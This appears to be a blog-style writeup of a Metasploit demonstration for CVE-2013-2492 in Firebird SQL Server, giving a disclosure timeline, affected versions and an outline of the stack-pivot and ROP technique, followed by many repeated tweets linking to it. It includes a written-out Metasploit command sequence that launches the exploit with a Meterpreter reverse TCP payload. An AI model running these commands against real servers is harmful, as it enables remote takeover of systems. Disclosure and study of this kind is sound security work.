Timeline :
Vulnerability discovered by Spencer McIntyre the 2013-01-31
Vulnerability reported to the vendor the 2013-03-05
Coordinate public release of the vulnerability the 2013-03-08
Metasploit PoC provided the 2013-03-08
PoC provided by :
Spencer McIntyre
Reference(s) :
Affected version(s) :
Firebird versions 2.1.3-2.1.5 and 2.5.1-2.5.2
Tested on Windows XP Pro SP3 with :
FireBird 2.5.2.26539
Description :
This module exploits a vulnerability in Firebird SQL Server. A specially crafted packet can be sent which will overwrite a pointer allowing the attacker to control where data is read from. Shortly, following the controlled read, the pointer is called resulting in code execution. The vulnerability exists with a group number extracted from the CNCT information, which is sent by the client, and whose size is not properly checked. This module uses an existing call to memcpy, just prior to the vulnerable code, which allows a small amount of data to be written to the stack. A two-phases stackpivot allows to execute the ROP chain which ultimately is used to execute VirtualAlloc and bypass DEP.
Commands :
use exploit/windows/misc/fb_cnct_group set RHOST 192.168.178.22 set TARGET 0 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.36 exploit getuid sysinfo
CVE-2013-2492 Firebird Relational Database Vulnerability Metasploit Demo: http://t.co/TvDC9yDJZG
RT @unix_root: RT @eromang: CVE-2013-2492 Firebird Relational Database Vulnerability Metasploit Demo http://t.co/sYLE8rYY9Q
RT @unix_root: RT @eromang: CVE-2013-2492 Firebird Relational Database Vulnerability Metasploit Demo http://t.co/sYLE8rYY9Q
Top story: CVE-2013-2492 Firebird Database Vulnerability Metasploit Demo http://t.co/7DQbDQXX3Y, see more http://t.co/wR1WKW2x9u
RT @eromang: CVE-2013-2492 Firebird Relational Database Vulnerability Metasploit Demo http://t.co/ciTjm2O1SJ
RT @unix_root: RT @eromang: CVE-2013-2492 Firebird Relational Database Vulnerability Metasploit Demo http://t.co/sYLE8rYY9Q
RT @unix_root: RT @eromang: CVE-2013-2492 Firebird Relational Database Vulnerability Metasploit Demo http://t.co/sYLE8rYY9Q
RT @unix_root: RT @eromang: CVE-2013-2492 Firebird Relational Database Vulnerability Metasploit Demo http://t.co/sYLE8rYY9Q
RT @unix_root: RT @eromang: CVE-2013-2492 Firebird Relational Database Vulnerability Metasploit Demo http://t.co/sYLE8rYY9Q
RT @unix_root: RT @eromang: CVE-2013-2492 Firebird Relational Database Vulnerability Metasploit Demo http://t.co/sYLE8rYY9Q
RT @unix_root: RT @eromang: CVE-2013-2492 Firebird Relational Database Vulnerability Metasploit Demo http://t.co/sYLE8rYY9Q
CVE-2013-2492 Firebird Database Vulnerability Metasploit Demo
B! http://t.co/YrzdnJeTkX
#twihateb
RT @eromang: CVE-2013-2492 Firebird Relational Database Vulnerability Metasploit Demo http://t.co/sYLE8rYY9Q
RT @eromang: CVE-2013-2492 Firebird Relational Database Vulnerability Metasploit Demo http://t.co/ciTjm2O1SJ
CVE-2013-2492 Firebird Relational Database Vulnerability Metasploit Demo http://t.co/ciTjm2O1SJ